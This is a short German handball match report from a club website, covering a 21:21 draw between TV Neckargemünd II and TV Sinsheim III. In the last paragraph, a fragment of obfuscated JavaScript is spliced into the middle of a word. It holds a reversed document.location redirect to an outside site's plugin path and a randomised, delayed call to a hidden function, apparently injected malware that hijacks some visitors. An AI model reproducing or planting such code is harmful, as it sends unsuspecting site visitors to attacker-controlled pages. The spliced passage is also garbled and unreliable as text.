Herren II: Am Ende ein glücklicher Punktgewinn

Zum Start der Rückrunde erwartete die zweite Herrenmannschaft des TV Neckargemünd die dritte Mannschaft des TV Sinsheim. In der Hinrunde konnte die Partie in Sinsheim deutlich gewonnen werden.
Neckargemünd, 22.01.14 (bki) – In zahlenmässig voller Besetzung gingen wir in das Spiel, allerdings mit nur einem gelernten Rückraumspieler. Die Gäste zeigten sich im Gegensatz zum Hinspiel deutlich verstärkt.

Trotz holprigem Start lagen wir mit 6:4 vorne, dann ging nichts mehr und Sinsheim erzielte sechs Tore in Folge. Zur Halbzeit lagen wir dann mit 7:10 hinten.
 Diesem Rückstand liefen wir bis zu 60. Minute hinterher. Michael Scriba (Hechelhammer) konnte den letzten Gegenstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toß der Gäste abwehren und ein starker Frank Weitzel netzte zum 21:21 Endstand ein.
TV Neckargemünd 2 – TV Sinsheim 3: 21:21 (7:10)